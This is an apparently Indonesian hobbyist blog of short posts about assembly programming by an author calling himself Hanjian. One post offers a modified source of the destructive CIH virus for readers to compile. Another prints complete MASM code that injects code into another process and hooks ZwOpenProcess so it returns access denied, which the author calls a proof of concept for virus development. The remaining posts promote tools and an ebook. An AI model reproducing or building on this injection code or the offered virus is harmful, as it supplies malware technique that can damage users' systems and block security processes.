CIH 2 By Hanjian

Kemarin ada yang nanya saya masalah CIH atau Virus yang merusak Hardware ke saya…N sekian lama saya mencari sample na ama Source na akhir na ketemu juga jadi saya Akan Mempublish CIH yang sudah saya Modif…dan saya da ubah Pola na menjadi 32 BIT yang lebih super

Ingat Virus ini berbahaya disini yang saya kasih Source na Bukan EXE na, jadi Hati2..

Kalo mau di Compile pake RadASM ama MASM32, lalu di Build jangan di Run

Ingat saya tidak bertanggung jawab atas kerusakan yang terjadi di Komputer anda karena disini saya hanya memberikan Source na Bukan EXE na jadi hati2 ya..

Info: Source nya jalan di kernel mode atau Ring-0 atau di Mode yang tidak di Proteksi sama OS, kalau mau jalanin di Kompie tua aja.

silahkan Nikmati ya (DiCOba)

salam,

Hanjian

Visualisasi Assembly with RadASM by Hanjian

yang saya post malam ini, sample Program dengan Assembly seacara visual memakai RadASm dan MASM32…

yang saya kasih disini adalah Sample Program dengan Source Code

silahkan dicoba disini

salam,

Hanjian

Hooking Process With Assembly Method By Hanjian

Pagi ini saya Post Pertanyaan dari Darkzzz…yang intinya mengenai Hook Process List….

N maaf sebelumnya karena saya Post pake Assembly Method supaya lebih Afdol

Ok langsung aja ya….

—————————————Begin Code——————————————

.386
.model flat, stdcall
option casemap:none

include windows.inc
include kernel32.inc

includelib kernel32.lib

.data

hProc dd 0
szNtdll db “ntdll.dll”,0
hmodNtdll dd 0
szZwOpenProcess db “ZwOpenProcess”,0
hOpenProcess dd 0
hVmEx dd 0
brw dd 0
szKernel32dll db “kernel32.dll”,0
hmodKernel32 dd 0
szSetLastError db “SetLastError”,0
hLastError dd 0
pold dd 0
.code

;; shell code
shellcode:

@@SetLastError equ $ – offset shellcode + 1
mov eax,0
push 5
call eax
xor eax,eax
retn
shell_code_size equ $ – offset shellcode

@jumper:
mov eax, 0C0000022h
retn 10h
jumper_size equ $ – offset @jumper

mati:
push 0
call ExitProcess

start:

invoke     OpenProcess,PROCESS_ALL_ACCESS,0,460
test eax,eax
jnz @F
call mati
@@:

mov hProc,eax
mov esi,eax

invoke     GetModuleHandle,offset szNtdll
test eax,eax
jnz @F
call mati
@@:
mov hmodNtdll,eax

invoke GetProcAddress,eax,offset szZwOpenProcess
test eax,eax
jnz @F
call mati
@@:

mov hOpenProcess,eax

invoke VirtualAllocEx,esi,0,shell_code_size,MEM_COMMIT,PAGE_EXECUTE_READWRITE
test eax,eax
jnz @F
call mati
@@:
mov hVmEx,eax

invoke WriteProcessMemory,esi,eax,offset shellcode,shell_code_size,offset brw

invoke GetModuleHandle,offset szKernel32dll
test eax,eax
jnz @F
call mati
@@:
mov hmodKernel32,eax
invoke GetProcAddress,eax,offset szSetLastError
test eax,eax
jnz @F
call mati
@@:
mov hLastError,eax

invoke WriteProcessMemory,esi,offset shellcode + @@SetLastError,offset hLastError,4,offset brw

mov edi,hOpenProcess
invoke VirtualProtectEx,esi,edi,jumper_size,PAGE_EXECUTE_READWRITE,offset pold
invoke WriteProcessMemory,esi,edi,offset @jumper,jumper_size,offset brw
invoke VirtualProtectEx,esi,edi,jumper_size,pold,offset brw

call mati
end start

————————————–End————————————-

saya rasa da banyak yang tau masalah ASM kan jadi ngg Susah. N ingat ini hanya sample untuk percobaan saya..dan kalau menurut saya ini adalah Proof Of Concept untuk Pengembangan Virus

kira2 itu aja….Mudah2an ada Manfaatnya

salam,

Hanjian

Win-ID

Mungkin ada yang pernah mendownload Winhack dari VB-bego…..Serupa tapi tak sama tool ini saya dapat dari Google tapi dengan tool ini kita akan tau apa aja yang ada di Windows silahkan di Coba

http://rapidshare.com/files/101703561/WinID.zip.html

Salam,

Hanjian

Analisa Hanjian Virus…..

Bagi yang ingin mengetahui Analisa dari Hanjian Virus bisa langsung ke

http://autonuxregen.blogspot.com/2008/03/analisa-membasmi-virus-hanjian.html

ThX for Your Analys..

salam,

Hanjian

Ebook 1(One) Assembly 32 for NewBie By HaNJiaN

Sudah lama saya ingin membuat suatu ebook yang membahas tentang Bahasa Rakitan atau Assembly, but sekarang saya da berhasil membuatnya untuk para pencinta Bahasa ini Ngg usah sungkan untuk membaca karena mungkin ada manfaatnya.

Oke.. Materrinya antara lain adalah penjelasan RadASM dan MASM32 dari cara menyetingnya sampai instalasi, tata cara penulisan kode ASM dalam RadASM dalam 32 BIT beberapa elemen dasar dan beberapa contoh kode Program.

Semua itu tidak terlepas dari Google Search 

mau tahu lebih lanjut masalah ebook ini langsung aja di Download

salam,

Hanjian

CPUid with Asm & Delphi Method by Hanjian

Kalo kemarin yang saya upload punya mas anvie kali ini giliran saya, tapi dalam aplikasi ini memakai IDE delphi tapi masih sama intinya yaitu berbau Vertical Programming… kali ini adalah mengetahui MMX CPUid tapi dengan banyak tambahan,..

Mau tau apa aja….Intinya dibuat dengan delphi ya.. CPUID namanya langsung aja ya di jajal lengkap dengan panduannya ya…

HAJAR BRO 

salam,

Hanjian